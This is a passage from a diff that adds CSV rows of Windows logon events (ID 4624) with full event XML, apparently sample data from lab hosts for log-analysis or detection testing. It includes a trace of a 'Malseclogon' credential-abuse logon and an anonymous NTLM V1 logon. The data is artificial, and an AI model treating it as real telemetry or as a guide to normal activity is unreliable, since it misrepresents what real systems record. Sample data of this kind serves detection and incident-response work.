+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""2908"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-220106</Data>
+    <Data Name=""TargetUserName"">samir</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x567758</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:20.450493Z"">
+    </TimeCreated>
+    <EventRecordID>2988529</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""2908"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-220106</Data>
+    <Data Name=""TargetUserName"">samir</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x567515</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.25</Data>
+    <Data Name=""IpPort"">50251</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:19.725408Z"">
+    </TimeCreated>
+    <EventRecordID>2988525</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4524"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x56738f</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64223</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:19.637236Z"">
+    </TimeCreated>
+    <EventRecordID>2988522</EventRecordID>
+    <Correlation ActivityID=""2654C2A7-231C-0002-BAC2-54261C23D801"">
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-84104</Data>
+    <Data Name=""TargetUserName"">02694W-WIN10$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x567343</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">429CA5A3-EDFC-5657-17C3-C050C7B047F4</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.25</Data>
+    <Data Name=""IpPort"">50250</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-23T16:50:17.194652Z"">
+    </TimeCreated>
+    <EventRecordID>772611</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""588"" ThreadID=""2996"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x1137987</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">50107</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-23T16:50:16.870643Z"">
+    </TimeCreated>
+    <EventRecordID>772609</EventRecordID>
+    <Correlation ActivityID=""E671C39D-919D-0001-B2C3-71E69D91D601"">
+    </Correlation>
+    <Execution ProcessID=""588"" ThreadID=""3692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""SubjectDomainName"">3B</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x244</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-23T16:50:16.697736Z"">
+    </TimeCreated>
+    <EventRecordID>772607</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""588"" ThreadID=""3692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x1136e95</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">50106</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.616154Z"">
+    </TimeCreated>
+    <EventRecordID>329918</EventRecordID>
+    <Correlation ActivityID=""B04CB785-EBD3-0000-16B8-4CB0D3EBD701"">
+    </Correlation>
+    <Execution ProcessID=""636"" ThreadID=""7156"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""LogonType"">9</Data>
+    <Data Name=""LogonProcessName"">seclogo</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1bc4</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">0</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">MalseclogonUser</Data>
+    <Data Name=""TargetOutboundDomainName"">MalseclogonDomain</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:31:34.954809Z"">
+    </TimeCreated>
+    <EventRecordID>768628</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""2688"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x32a0d3</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">6747BCF0-DBAA-F21C-878B-EB339B03FA80</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50441</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:31:32.206739Z"">
+    </TimeCreated>
+    <EventRecordID>768627</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x329baa</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50443</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:30:32.190369Z"">
+    </TimeCreated>
+    <EventRecordID>768622</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x320935</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50438</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:51.517594Z"">
+    </TimeCreated>
+    <EventRecordID>768621</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""2688"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x31ff89</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49707</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
